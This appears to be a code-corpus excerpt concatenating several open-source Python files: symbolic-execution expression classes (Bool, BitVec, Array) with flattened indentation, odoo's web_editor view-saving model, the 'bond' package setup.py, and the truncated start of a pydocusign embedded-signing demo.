# assert all(isinstance(x, Expression) for x in operands)
self._operands = operands
# If taint was not forced by a keyword argument, calculate default
if "taint" not in kwargs:
kwargs["taint"] = reduce(lambda x, y: x.union(y.taint), operands, frozenset())
super().__init__(**kwargs)
@property
def operands(self):
return self._operands
###############################################################################
# Booleans
class Bool(Expression):
def __init__(self, *operands, **kwargs):
super().__init__(*operands, **kwargs)
def cast(self, value: Union[int, bool], **kwargs) -> Union["BoolConstant", "Bool"]:
if isinstance(value, Bool):
return value
return BoolConstant(bool(value), **kwargs)
def __cmp__(self, *args):
raise NotImplementedError("CMP for Bool")
def __invert__(self):
return BoolNot(self)
def __eq__(self, other):
return BoolEqual(self, self.cast(other))
def __hash__(self):
return object.__hash__(self)
def __ne__(self, other):
return BoolNot(self == self.cast(other))
def __and__(self, other):
return BoolAnd(self, self.cast(other))
def __or__(self, other):
return BoolOr(self, self.cast(other))
def __xor__(self, other):
return BoolXor(self, self.cast(other))
def __rand__(self, other):
return BoolAnd(self.cast(other), self)
def __ror__(self, other):
return BoolOr(self.cast(other), self)
def __rxor__(self, other):
return BoolXor(self.cast(other), self)
def __bool__(self):
raise NotImplementedError("__bool__ for Bool")
class BoolVariable(Bool, Variable):
def __init__(self, name, *args, **kwargs):
super().__init__(name, *args, **kwargs)
@property
def declaration(self):
return f"(declare-fun {self.name} () Bool)"
class BoolConstant(Bool, Constant):
def __init__(self, value: bool, *args, **kwargs):
super().__init__(value, *args, **kwargs)
def __bool__(self):
return self.value
class BoolOperation(Operation, Bool):
def __init__(self, *operands, **kwargs):
super().__init__(*operands, **kwargs)
class BoolNot(BoolOperation):
def __init__(self, value, **kwargs):
super().__init__(value, **kwargs)
class BoolAnd(BoolOperation):
def __init__(self, a, b, **kwargs):
super().__init__(a, b, **kwargs)
class BoolOr(BoolOperation):
def __init__(self, a: "Bool", b: "Bool", **kwargs):
super().__init__(a, b, **kwargs)
class BoolXor(BoolOperation):
def __init__(self, a, b, **kwargs):
super().__init__(a, b, **kwargs)
class BoolITE(BoolOperation):
def __init__(self, cond: "Bool", true: "Bool", false: "Bool", **kwargs):
super().__init__(cond, true, false, **kwargs)
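# A small sketch of how the Bool operator overloads build expression trees
# (illustrative only; the variable names are assumptions):
def _example_bool_ast():
    a = BoolVariable("a")
    b = BoolVariable("b")
    # Python operators return Operation nodes instead of evaluating eagerly.
    expr = (a & b) | ~a
    assert isinstance(expr, BoolOr)
    assert isinstance(expr.operands[0], BoolAnd)
    assert isinstance(expr.operands[1], BoolNot)
    # Plain Python bools are lifted through Bool.cast().
    assert isinstance(a & True, BoolAnd)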
class BitVec(Expression):
""" This adds a bitsize to the Expression class """
def __init__(self, size, *operands, **kwargs):
super().__init__(*operands, **kwargs)
self.size = size
@property
def mask(self):
return (1 << self.size) - 1
@property
def signmask(self):
return 1 << (self.size - 1)
def cast(
self, value: Union["BitVec", str, int, bytes], **kwargs
) -> Union["BitVecConstant", "BitVec"]:
if isinstance(value, BitVec):
assert value.size == self.size
return value
if isinstance(value, (str, bytes)) and len(value) == 1:
value = ord(value)
        # Try to support non-Integral types that can be cast to int
if not isinstance(value, int):
value = int(value)
# FIXME? Assert it fits in the representation
return BitVecConstant(self.size, value, **kwargs)
def __add__(self, other):
return BitVecAdd(self, self.cast(other))
def __sub__(self, other):
return BitVecSub(self, self.cast(other))
def __mul__(self, other):
return BitVecMul(self, self.cast(other))
def __mod__(self, other):
return BitVecMod(self, self.cast(other))
# object.__divmod__(self, other)
# object.__pow__(self, other[, modulo])
def __lshift__(self, other):
return BitVecShiftLeft(self, self.cast(other))
def __rshift__(self, other):
return BitVecShiftRight(self, self.cast(other))
def __and__(self, other):
return BitVecAnd(self, self.cast(other))
def __xor__(self, other):
return BitVecXor(self, self.cast(other))
def __or__(self, other):
return BitVecOr(self, self.cast(other))
    # The division operator (/) is implemented by __truediv__ in Python 3.
    # __div__ is kept as an alias for any legacy (Python 2 style) callers.
def __div__(self, other):
return BitVecDiv(self, self.cast(other))
def __truediv__(self, other):
return BitVecDiv(self, self.cast(other))
def __floordiv__(self, other):
return self / other
# These methods are called to implement the binary arithmetic operations
# (+, # -, *, /, %, divmod(), pow(), **, <<, >>, &, ^, |) with reflected
# (swapped) operands. These functions are only called if the left operand
# does not support the corresponding operation and the operands are of
# different types. [2] For instance, to evaluate the expression x - y,
# where y is an instance of a class that has an __rsub__() method,
# y.__rsub__(x) is called if x.__sub__(y) returns NotImplemented.
def __radd__(self, other):
return BitVecAdd(self.cast(other), self)
def __rsub__(self, other):
return BitVecSub(self.cast(other), self)
def __rmul__(self, other):
return BitVecMul(self.cast(other), self)
def __rmod__(self, other):
return BitVecMod(self.cast(other), self)
def __rtruediv__(self, other):
return BitVecDiv(self.cast(other), self)
def __rdiv__(self, other):
return BitVecDiv(self.cast(other), self)
# object.__rdivmod__(self, other)
# object.__rpow__(self, other)
def __rlshift__(self, other):
return BitVecShiftLeft(self.cast(other), self)
def __rrshift__(self, other):
return BitVecShiftRight(self.cast(other), self)
def __rand__(self, other):
return BitVecAnd(self.cast(other), self)
def __rxor__(self, other):
return BitVecXor(self.cast(other), self)
def __ror__(self, other):
return BitVecOr(self.cast(other), self)
def __invert__(self):
return BitVecXor(self, self.cast(self.mask))
# These are the so-called "rich comparison" methods, and are called
# for comparison operators in preference to __cmp__() below. The
# correspondence between operator symbols and method names is as
# follows:
# x<y calls x.__lt__(y),
# x<=y calls x.__le__(y),
# x==y calls x.__eq__(y),
    # x!=y calls x.__ne__(y),
# x>y calls x.__gt__(y), and
# x>=y calls x.__ge__(y).
def __lt__(self, other):
return LessThan(self, self.cast(other))
def __le__(self, other):
return LessOrEqual(self, self.cast(other))
def __eq__(self, other):
return BoolEqual(self, self.cast(other))
def __hash__(self):
return object.__hash__(self)
def __ne__(self, other):
return BoolNot(BoolEqual(self, self.cast(other)))
def __gt__(self, other):
return GreaterThan(self, self.cast(other))
def __ge__(self, other):
return GreaterOrEqual(self, self.cast(other))
def __neg__(self):
return BitVecNeg(self)
# Unsigned comparisons
def ugt(self, other):
return UnsignedGreaterThan(self, self.cast(other))
def uge(self, other):
return UnsignedGreaterOrEqual(self, self.cast(other))
def ult(self, other):
return UnsignedLessThan(self, self.cast(other))
def ule(self, other):
return UnsignedLessOrEqual(self, self.cast(other))
def udiv(self, other):
return BitVecUnsignedDiv(self, self.cast(other))
def rudiv(self, other):
return BitVecUnsignedDiv(self.cast(other), self)
def sdiv(self, other):
return BitVecDiv(self, self.cast(other))
def rsdiv(self, other):
return BitVecDiv(self.cast(other), self)
def srem(self, other):
return BitVecRem(self, self.cast(other))
def rsrem(self, other):
return BitVecRem(self.cast(other), self)
def urem(self, other):
return BitVecUnsignedRem(self, self.cast(other))
def rurem(self, other):
return BitVecUnsignedRem(self.cast(other), self)
def sar(self, other):
return BitVecArithmeticShiftRight(self, self.cast(other))
def sal(self, other):
return BitVecArithmeticShiftLeft(self, self.cast(other))
def Bool(self):
return self != 0
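# A sketch of the BitVec operator overloads above (illustrative only; the
# width and variable name are assumptions):
def _example_bitvec_ast():
    x = BitVecVariable(32, "x")
    # Arithmetic with plain ints is lifted through BitVec.cast().
    expr = (x + 1) * 2
    assert isinstance(expr, BitVecMul)
    assert isinstance(expr.operands[0], BitVecAdd)
    # Comparisons yield Bool expressions; ugt/ult/... are the unsigned forms.
    assert isinstance(x < 10, LessThan)
    assert isinstance(x.ult(10), UnsignedLessThan)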
class BitVecVariable(BitVec, Variable):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@property
def declaration(self):
return f"(declare-fun {self.name} () (_ BitVec {self.size}))"
class BitVecConstant(BitVec, Constant):
def __init__(self, size: int, value: int, *args, **kwargs):
super().__init__(size, value, *args, **kwargs)
def __bool__(self):
return self.value != 0
def __eq__(self, other):
if self.taint:
return super().__eq__(other)
return self.value == other
def __hash__(self):
return super().__hash__()
class BitVecOperation(BitVec, Operation):
def __init__(self, size, *operands, **kwargs):
super().__init__(size, *operands, **kwargs)
class BitVecAdd(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecSub(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecMul(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecDiv(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecUnsignedDiv(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecMod(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecRem(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecUnsignedRem(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecShiftLeft(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecShiftRight(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecArithmeticShiftLeft(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecArithmeticShiftRight(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecAnd(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecOr(BitVecOperation):
def __init__(self, a: BitVec, b: BitVec, *args, **kwargs):
assert a.size == b.size
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecXor(BitVecOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a.size, a, b, *args, **kwargs)
class BitVecNot(BitVecOperation):
def __init__(self, a, **kwargs):
super().__init__(a.size, a, **kwargs)
class BitVecNeg(BitVecOperation):
def __init__(self, a, *args, **kwargs):
super().__init__(a.size, a, *args, **kwargs)
# Comparing two bitvectors results in a Bool
class LessThan(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a, b, *args, **kwargs)
class LessOrEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
super().__init__(a, b, *args, **kwargs)
class BoolEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
if isinstance(a, BitVec) or isinstance(b, BitVec):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class GreaterThan(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class GreaterOrEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class UnsignedLessThan(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
        assert a.size == b.size
        super().__init__(a, b, *args, **kwargs)
class UnsignedLessOrEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class UnsignedGreaterThan(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
super().__init__(a, b, *args, **kwargs)
class UnsignedGreaterOrEqual(BoolOperation):
def __init__(self, a, b, *args, **kwargs):
assert a.size == b.size
        super().__init__(a, b, *args, **kwargs)
###############################################################################
# Array BV32 -> BV8 or BV64 -> BV8
class Array(Expression):
def __init__(
self, index_bits: int, index_max: Optional[int], value_bits: int, *operands, **kwargs
):
assert index_bits in (32, 64, 256)
assert value_bits in (8, 16, 32, 64, 256)
assert index_max is None or index_max >= 0 and index_max < 2 ** index_bits
self._index_bits = index_bits
self._index_max = index_max
self._value_bits = value_bits
super().__init__(*operands, **kwargs)
assert type(self) is not Array, "Abstract class"
def _get_size(self, index):
start, stop = self._fix_index(index)
size = stop - start
if isinstance(size, BitVec):
from .visitors import simplify
size = simplify(size)
else:
size = BitVecConstant(self.index_bits, size)
assert isinstance(size, BitVecConstant)
return size.value
def _fix_index(self, index):
"""
:param slice index:
"""
stop, start = index.stop, index.start
if start is None:
start = 0
if stop is None:
stop = len(self)
return start, stop
def cast(self, possible_array):
if isinstance(possible_array, bytearray):
            # FIXME This should be related to a ConstraintSet
arr = ArrayVariable(self.index_bits, len(possible_array), 8)
for pos, byte in enumerate(possible_array):
arr = arr.store(pos, byte)
return arr
raise ValueError # cast not implemented
def cast_index(self, index: Union[int, "BitVec"]) -> Union["BitVecConstant", "BitVec"]:
if isinstance(index, int):
# assert self.index_max is None or index >= 0 and index < self.index_max
return BitVecConstant(self.index_bits, index)
assert index.size == self.index_bits
return index
def cast_value(
self, value: Union["BitVec", str, bytes, int]
) -> Union["BitVecConstant", "BitVec"]:
if isinstance(value, BitVec):
assert value.size == self.value_bits
return value
if isinstance(value, (str, bytes)) and len(value) == 1:
value = ord(value)
if not isinstance(value, int):
value = int(value)
return BitVecConstant(self.value_bits, value)
def __len__(self):
if self.index_max is None:
raise ExpressionException("Array max index not set")
return self.index_max
@property
def index_bits(self):
return self._index_bits
@property
def value_bits(self):
return self._value_bits
@property
def index_max(self):
return self._index_max
def select(self, index):
index = self.cast_index(index)
return ArraySelect(self, index)
def store(self, index, value):
return ArrayStore(self, self.cast_index(index), self.cast_value(value))
def write(self, offset, buf):
if not isinstance(buf, (Array, bytearray)):
raise TypeError("Array or bytearray expected got {:s}".format(type(buf)))
arr = self
for i, val in enumerate(buf):
arr = arr.store(offset + i, val)
return arr
def read(self, offset, size):
return ArraySlice(self, offset, size)
def __getitem__(self, index):
if isinstance(index, slice):
start, stop = self._fix_index(index)
size = self._get_size(index)
return ArraySlice(self, start, size)
else:
if self.index_max is not None:
if not isinstance(index, Expression) and index >= self.index_max:
raise IndexError
return self.select(self.cast_index(index))
def __eq__(self, other):
# FIXME taint
def compare_buffers(a, b):
if len(a) != len(b):
return BoolConstant(False)
cond = BoolConstant(True)
for i in range(len(a)):
cond = BoolAnd(cond.cast(a[i] == b[i]), cond)
                if isinstance(cond, BoolConstant) and not cond.value:
                    return BoolConstant(False)
return cond
return compare_buffers(self, other)
def __ne__(self, other):
return BoolNot(self == other)
def __hash__(self):
return super().__hash__()
@property
def underlying_variable(self):
array = self
while not isinstance(array, ArrayVariable):
array = array.array
return array
    def read_BE(self, address, size):
        address = self.cast_index(address)
        bytes = []
for offset in range(size):
bytes.append(self.get(address + offset, 0))
return BitVecConcat(size * self.value_bits, *bytes)
def read_LE(self, address, size):
address = self.cast_index(address)
bytes = []
for offset in range(size):
bytes.append(self.get(address + offset, 0))
return BitVecConcat(size * self.value_bits, *reversed(bytes))
def write_BE(self, address, value, size):
address = self.cast_index(address)
value = BitVec(size * self.value_bits).cast(value)
array = self
for offset in range(size):
array = array.store(
address + offset,
BitVecExtract(value, (size - 1 - offset) * self.value_bits, self.value_bits),
)
return array
def write_LE(self, address, value, size):
address = self.cast_index(address)
value = BitVec(size * self.value_bits).cast(value)
array = self
        for offset in reversed(range(size)):
            array = array.store(
                address + offset,
                # little endian: the least significant byte goes at the lowest address
                BitVecExtract(value, offset * self.value_bits, self.value_bits),
            )
return array
def __add__(self, other):
if not isinstance(other, (Array, bytearray)):
raise TypeError("can't concat Array to {}".format(type(other)))
if isinstance(other, Array):
if self.index_bits != other.index_bits or self.value_bits != other.value_bits:
raise ValueError("Array sizes do not match for concatenation")
from .visitors import simplify
            # FIXME This should be related to a ConstraintSet
new_arr = ArrayProxy(
ArrayVariable(
self.index_bits,
self.index_max + len(other),
self.value_bits,
"concatenation{}".format(uuid.uuid1()),
)
)
for index in range(self.index_max):
new_arr[index] = simplify(self[index])
for index in range(len(other)):
new_arr[index + self.index_max] = simplify(other[index])
return new_arr
def __radd__(self, other):
if not isinstance(other, (Array, bytearray, bytes)):
raise TypeError("can't concat Array to {}".format(type(other)))
if isinstance(other, Array):
if self.index_bits != other.index_bits or self.value_bits != other.value_bits:
raise ValueError("Array sizes do not match for concatenation")
from .visitors import simplify
            # FIXME This should be related to a ConstraintSet
new_arr = ArrayProxy(
ArrayVariable(
self.index_bits,
self.index_max + len(other),
self.value_bits,
"concatenation{}".format(uuid.uuid1()),
)
)
for index in range(len(other)):
new_arr[index] = simplify(other[index])
_concrete_cache = new_arr._concrete_cache
for index in range(self.index_max):
new_arr[index + len(other)] = simplify(self[index])
new_arr._concrete_cache.update(_concrete_cache)
return new_arr
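# A sketch of building symbolic memory with the Array classes above
# (illustrative only; the names and sizes are assumptions):
def _example_array_usage():
    arr = ArrayVariable(32, 1024, 8, "mem")
    # store() is functional: it returns a new ArrayStore node.
    arr2 = arr.store(0, 0x41)
    assert isinstance(arr2, ArrayStore)
    # Reading back builds an ArraySelect over the store chain.
    assert isinstance(arr2.select(0), ArraySelect)
    # The multi-byte helpers split a value into per-byte stores.
    arr3 = arr2.write_LE(4, 0xDEADBEEF, 4)
    assert isinstance(arr3, ArrayStore)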
class ArrayVariable(Array, Variable):
def __init__(self, index_bits, index_max, value_bits, name, *operands, **kwargs):
super().__init__(index_bits, index_max, value_bits, name, **kwargs)
@property
def declaration(self):
return f"(declare-fun {self.name} () (Array (_ BitVec {self.index_bits}) (_ BitVec {self.value_bits})))"
class ArrayOperation(Array, Operation):
def __init__(self, array: Array, *operands, **kwargs):
super().__init__(
array.index_bits, array.index_max, array.value_bits, array, *operands, **kwargs
)
class ArrayStore(ArrayOperation):
def __init__(self, array: "Array", index: "BitVec", value: "BitVec", *args, **kwargs):
assert index.size == array.index_bits
assert value.size == array.value_bits
super().__init__(array, index, value, *args, **kwargs)
@property
def array(self):
return self.operands[0]
@property
def name(self):
return self.operands[0].name
@property
def index(self):
return self.operands[1]
@property
def value(self):
return self.operands[2]
class ArraySlice(Array):
def __init__(
self, array: Union["Array", "ArrayProxy"], offset: int, size: int, *args, **kwargs
):
if not isinstance(array, Array):
raise ValueError("Array expected")
if isinstance(array, ArrayProxy):
array = array._array
super().__init__(array.index_bits, array.index_max, array.value_bits, *args, **kwargs)
self._array = array
self._slice_offset = offset
self._slice_size = size
@property
def underlying_variable(self):
return self._array.underlying_variable
@property
def operands(self):
return self._array.operands
@property
def index_bits(self):
return self._array.index_bits
@property
def index_max(self):
return self._slice_size
@property
def value_bits(self):
return self._array.value_bits
@property
def taint(self):
return self._array.taint
def select(self, index):
return self._array.select(index + self._slice_offset)
def store(self, index, value):
return ArraySlice(
self._array.store(index + self._slice_offset, value),
self._slice_offset,
self._slice_size,
)
class ArrayProxy(Array):
def __init__(self, array: Array, default: Optional[int] = None):
self._default = default
self._concrete_cache: Dict[int, int] = {}
self._written = None
if isinstance(array, ArrayProxy):
# copy constructor
super().__init__(array.index_bits, array.index_max, array.value_bits)
self._array: Array = array._array
self._name: str = array._name
if default is None:
self._default = array._default
self._concrete_cache = dict(array._concrete_cache)
self._written = set(array.written)
elif isinstance(array, ArrayVariable):
# fresh array proxy
super().__init__(array.index_bits, array.index_max, array.value_bits)
self._array = array
self._name = array.name
else:
# arrayproxy for a prepopulated array
super().__init__(array.index_bits, array.index_max, array.value_bits)
self._name = array.underlying_variable.name
self._array = array
@property
def underlying_variable(self):
return self._array.underlying_variable
@property
def array(self):
return self._array
@property
def name(self):
return self._name
@property
def operands(self):
return self._array.operands
@property
def index_bits(self):
return self._array.index_bits
@property
def index_max(self):
return self._array.index_max
@property
def value_bits(self):
return self._array.value_bits
@property
def taint(self):
return self._array.taint
def select(self, index):
return self.get(index)
def store(self, index, value):
if not isinstance(index, Expression):
index = self.cast_index(index)
if not isinstance(value, Expression):
value = self.cast_value(value)
from .visitors import simplify
index = simplify(index)
if isinstance(index, Constant):
self._concrete_cache[index.value] = value
else:
            # discard the whole concrete cache, since a symbolic index may overwrite any entry
self._concrete_cache = {}
# potentially generate and update .written set
self.written.add(index)
self._array = self._array.store(index, value)
return self
def __getitem__(self, index):
if isinstance(index, slice):
start, stop = self._fix_index(index)
size = self._get_size(index)
array_proxy_slice = ArrayProxy(ArraySlice(self, start, size), default=self._default)
array_proxy_slice._concrete_cache = {}
for k, v in self._concrete_cache.items():
if k >= start and k < start + size:
array_proxy_slice._concrete_cache[k - start] = v
for i in self.written:
array_proxy_slice.written.add(i - start)
return array_proxy_slice
else:
if self.index_max is not None:
if not isinstance(index, Expression) and index >= self.index_max:
raise IndexError
return self.get(index, self._default)
def __setitem__(self, index, value):
if isinstance(index, slice):
start, stop = self._fix_index(index)
size = self._get_size(index)
assert len(value) == size
for i in range(size):
self.store(start + i, value[i])
else:
self.store(index, value)
def __getstate__(self):
state = {}
state["_default"] = self._default
state["_array"] = self._array
state["name"] = self.name
state["_concrete_cache"] = self._concrete_cache
state["_written"] = self._written
return state
def __setstate__(self, state):
self._default = state["_default"]
self._array = state["_array"]
self._name = state["name"]
self._concrete_cache = state["_concrete_cache"]
self._written = state["_written"]
def __copy__(self):
return ArrayProxy(self)
@property
def written(self):
        # Calculate only the first time
if self._written is None:
written = set()
            # take the array out of the Proxy sleeve
array = self._array
offset = 0
while isinstance(array, ArraySlice):
                # if it is a proxy over a slice, take out the slice too
offset += array._slice_offset
array = array._array
while not isinstance(array, ArrayVariable):
                # Indexes written to the underlying Array are displaced when sliced
written.add(array.index - offset)
array = array.array
assert isinstance(array, ArrayVariable)
self._written = written
return self._written
def is_known(self, index):
if isinstance(index, Constant) and index.value in self._concrete_cache:
return BoolConstant(True)
is_known_index = BoolConstant(False)
written = self.written
for known_index in written:
if isinstance(index, Constant) and isinstance(known_index, Constant):
if known_index.value == index.value:
return BoolConstant(True)
is_known_index = BoolOr(is_known_index.cast(index == known_index), is_known_index)
return is_known_index
def get(self, index, default=None):
if default is None:
default = self._default
index = self.cast_index(index)
if self.index_max is not None:
from .visitors import simplify
index = simplify(
BitVecITE(self.index_bits, index < 0, self.index_max + index + 1, index)
)
if isinstance(index, Constant) and index.value in self._concrete_cache:
return self._concrete_cache[index.value]
value = self._array.select(index)
if default is None:
return value
is_known = self.is_known(index)
default = self.cast_value(default)
return BitVecITE(self._array.value_bits, is_known, value, default)
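# A sketch of ArrayProxy's mutable interface and default values
# (illustrative only; the names and sizes are assumptions):
def _example_array_proxy():
    proxy = ArrayProxy(ArrayVariable(32, 1024, 8, "mem2"), default=0)
    proxy[0] = 0x41
    # Concrete writes are cached and read back directly.
    assert proxy[0].value == 0x41
    # Unwritten indexes fall back to the default through a BitVecITE.
    assert isinstance(proxy[1], BitVecITE)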
class ArraySelect(BitVec, Operation):
def __init__(self, array: "Array", index: "BitVec", *args, **kwargs):
assert index.size == array.index_bits
super().__init__(array.value_bits, array, index, *args, **kwargs)
@property
def array(self):
return self.operands[0]
@property
def index(self):
return self.operands[1]
def __repr__(self):
return f"<ArraySelect obj with index={self.index}:\n{self.array}>"
class BitVecSignExtend(BitVecOperation):
def __init__(self, operand: "BitVec", size_dest: int, *args, **kwargs):
assert size_dest >= operand.size
super().__init__(size_dest, operand, *args, **kwargs)
self.extend = size_dest - operand.size
class BitVecZeroExtend(BitVecOperation):
def __init__(self, size_dest: int, operand: "BitVec", *args, **kwargs):
assert size_dest >= operand.size
super().__init__(size_dest, operand, *args, **kwargs)
self.extend = size_dest - operand.size
class BitVecExtract(BitVecOperation):
def __init__(self, operand: "BitVec", offset: int, size: int, *args, **kwargs):
assert offset >= 0 and offset + size <= operand.size
super().__init__(size, operand, *args, **kwargs)
self._begining = offset
self._end = offset + size - 1
@property
def value(self):
return self.operands[0]
@property
def begining(self):
return self._begining
@property
def end(self):
return self._end
class BitVecConcat(BitVecOperation):
def __init__(self, size_dest: int, *operands, **kwargs):
assert all(isinstance(x, BitVec) for x in operands)
assert size_dest == sum(x.size for x in operands)
super().__init__(size_dest, *operands, **kwargs)
class BitVecITE(BitVecOperation):
def __init__(
self,
size: int,
condition: Union["Bool", bool],
true_value: "BitVec",
false_value: "BitVec",
*args,
**kwargs,
):
assert true_value.size == size
assert false_value.size == size
super().__init__(size, condition, true_value, false_value, *args, **kwargs)
| apache-2.0 | 5,668,414,571,755,638,000 | 29.555648 | 133 | 0.578651 | false | 3.842595 | false | false | false |
optima-ict/odoo | addons/web_editor/models/ir_ui_view.py | 40 | 4947 | # -*- coding: utf-8 -*-
import copy
import openerp
from openerp.exceptions import AccessError
from openerp.osv import osv
from lxml import etree, html
from openerp import api
class view(osv.osv):
_inherit = 'ir.ui.view'
@api.cr_uid_ids_context
def render(self, cr, uid, id_or_xml_id, values=None, engine='ir.qweb', context=None):
if not values:
values = {}
if values.get('editable'):
try:
if not isinstance(id_or_xml_id, (int, long)):
if '.' not in id_or_xml_id:
raise ValueError('Invalid template id: %r' % (id_or_xml_id,))
id_or_xml_id = self.get_view_id(cr, uid, id_or_xml_id, context=context)
self.check_access_rule(cr, uid, [id_or_xml_id], 'write', context=context)
except AccessError:
values['editable'] = False
return super(view, self).render(cr, uid, id_or_xml_id, values=values, engine=engine, context=context)
#------------------------------------------------------
# Save from html
#------------------------------------------------------
def extract_embedded_fields(self, cr, uid, arch, context=None):
return arch.xpath('//*[@data-oe-model != "ir.ui.view"]')
def save_embedded_field(self, cr, uid, el, context=None):
Model = self.pool[el.get('data-oe-model')]
field = el.get('data-oe-field')
converter = self.pool['ir.qweb'].get_converter_for(el.get('data-oe-type'))
value = converter.from_html(cr, uid, Model, Model._fields[field], el)
if value is not None:
# TODO: batch writes?
Model.write(cr, uid, [int(el.get('data-oe-id'))], {
field: value
}, context=context)
def _pretty_arch(self, arch):
# remove_blank_string does not seem to work on HTMLParser, and
# pretty-printing with lxml more or less requires stripping
# whitespace: http://lxml.de/FAQ.html#why-doesn-t-the-pretty-print-option-reformat-my-xml-output
# so serialize to XML, parse as XML (remove whitespace) then serialize
# as XML (pretty print)
arch_no_whitespace = etree.fromstring(
etree.tostring(arch, encoding='utf-8'),
parser=etree.XMLParser(encoding='utf-8', remove_blank_text=True))
return etree.tostring(
arch_no_whitespace, encoding='unicode', pretty_print=True)
def replace_arch_section(self, cr, uid, view_id, section_xpath, replacement, context=None):
# the root of the arch section shouldn't actually be replaced as it's
# not really editable itself, only the content truly is editable.
[view] = self.browse(cr, uid, [view_id], context=context)
arch = etree.fromstring(view.arch.encode('utf-8'))
# => get the replacement root
if not section_xpath:
root = arch
else:
# ensure there's only one match
[root] = arch.xpath(section_xpath)
root.text = replacement.text
root.tail = replacement.tail
# replace all children
del root[:]
for child in replacement:
root.append(copy.deepcopy(child))
return arch
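    # A minimal standalone sketch of the replacement performed above
    # (illustrative only; the sample XML is an assumption, not odoo data):
    #
    #   arch = etree.fromstring('<form><div id="s"><p>old</p></div></form>')
    #   replacement = etree.fromstring('<div>new<p>kept</p></div>')
    #   [root] = arch.xpath('//div[@id="s"]')
    #   root.text, root.tail = replacement.text, replacement.tail
    #   del root[:]
    #   for child in replacement:
    #       root.append(copy.deepcopy(child))
    #   # arch now serializes as
    #   # '<form><div id="s">new<p>kept</p></div></form>'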
def to_field_ref(self, cr, uid, el, context=None):
# filter out meta-information inserted in the document
attributes = dict((k, v) for k, v in el.items()
if not k.startswith('data-oe-'))
attributes['t-field'] = el.get('data-oe-expression')
out = html.html_parser.makeelement(el.tag, attrib=attributes)
out.tail = el.tail
return out
def save(self, cr, uid, res_id, value, xpath=None, context=None):
""" Update a view section. The view section may embed fields to write
:param str model:
:param int res_id:
:param str xpath: valid xpath to the tag to replace
"""
res_id = int(res_id)
arch_section = html.fromstring(
value, parser=html.HTMLParser(encoding='utf-8'))
if xpath is None:
# value is an embedded field on its own, not a view section
self.save_embedded_field(cr, uid, arch_section, context=context)
return
for el in self.extract_embedded_fields(cr, uid, arch_section, context=context):
self.save_embedded_field(cr, uid, el, context=context)
# transform embedded field back to t-field
el.getparent().replace(el, self.to_field_ref(cr, uid, el, context=context))
arch = self.replace_arch_section(cr, uid, res_id, xpath, arch_section, context=context)
self.write(cr, uid, res_id, {
'arch': self._pretty_arch(arch)
}, context=context)
view = self.browse(cr, openerp.SUPERUSER_ID, res_id, context=context)
if view.model_data_id:
view.model_data_id.write({'noupdate': True})
| agpl-3.0 | -3,438,966,866,468,648,000 | 38.576 | 109 | 0.585203 | false | 3.837859 | false | false | false |
necula01/bond | pybond/setup.py | 1 | 1281 | from distutils.core import setup
import os
here_dir = os.path.abspath(os.path.dirname(__file__))
def readme():
with open(os.path.join(here_dir, 'README.rst')) as f:
return f.read()
setup(
name='bond',
packages=['bond', 'bond.bond_helpers'],
version='1.1.0',
description='Testing with Spies and Mocks',
long_description=readme(),
author='George Necula, Erik Krogen',
author_email='[email protected]',
url='http://necula01.github.io/bond/',
license='BSD',
keywords=['testing', 'mocking'],
package_dir={
'bond' : 'bond'
},
package_data={
'bond' : [ 'AUTHORS.rst', 'LICENSE', 'README.rst']
},
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Natural Language :: English",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Topic :: Software Development :: Libraries :: Python Modules",
'Topic :: Software Development :: Testing'
]
)
| bsd-2-clause | 3,115,033,225,373,236,700 | 30.243902 | 71 | 0.594848 | false | 3.789941 | false | false | false |
kbussell/pydocusign | demo/embeddedsigning.py | 1 | 5150 | #!/usr/bin/env python
# coding=utf-8
"""Sample script that demonstrates `pydocusign` usage for embedded signing.
See also http://iodocs.docusign.com/APIWalkthrough/embeddedSigning
"""
from __future__ import print_function
import hashlib
import os
import uuid
import pydocusign
from pydocusign.test import fixtures_dir
try:
raw_input
except NameError:
raw_input = input
def prompt(environ_key, description, default):
try:
return os.environ[environ_key]
except KeyError:
